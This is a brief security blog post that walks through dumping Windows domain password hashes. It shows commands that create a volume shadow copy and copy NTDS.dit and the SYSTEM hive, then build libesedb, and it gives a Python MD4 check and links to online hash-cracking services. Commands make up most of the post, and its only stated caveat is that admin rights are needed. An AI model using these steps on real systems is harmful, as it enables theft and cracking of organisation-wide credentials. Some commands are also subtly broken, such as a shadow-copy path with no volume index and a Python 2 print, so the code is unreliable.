Security

Gathering NTLM Hashes – part 1

Reading Time: < 1 minute

One of the most reliable ways to gather system hashes is to use vsssadmin to create a shadow and copy of the system drive and then copy the files from them. These files typically are locked and protected by the system and so recovering them from the backup is among the easiest methods. The caveat here that you must be an administrator.

Step 1: Gather the data

run cmd as administrator
vssadmin list shadows
vssadmin create shadow /For=c:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\Windows\System32\config\SYSTEM C:\

Step 2: Installing the tools

We are going to need some tools

git clone https://github.com/libyal/libesedb.git
cd libesedb/
./synclibs.sh
./autogen.sh

I know I usually want to perform a sanity check to make sure I am getting the right hash. The quickest might be to use a snippet of python to check.

import hashlib,binascii
hash = hashlib.new('md4', "thisismyhashvalue".encode('utf-16le')).digest()
print binascii.hexlify(hash)

  • https://hashc.co.uk/
  • https://github.com/libyal/libesedb/wiki/Building
  • http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
  • http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_3_beta.zip
  • https://hashkiller.co.uk/ntlm-decrypter.aspx
  • https://gpuhash.me/
  • https://TMTO.org

Related posts

Security+

user

What is a SIEM

Tom Hamilton

Installing Nessus on Ubuntu

Tom Hamilton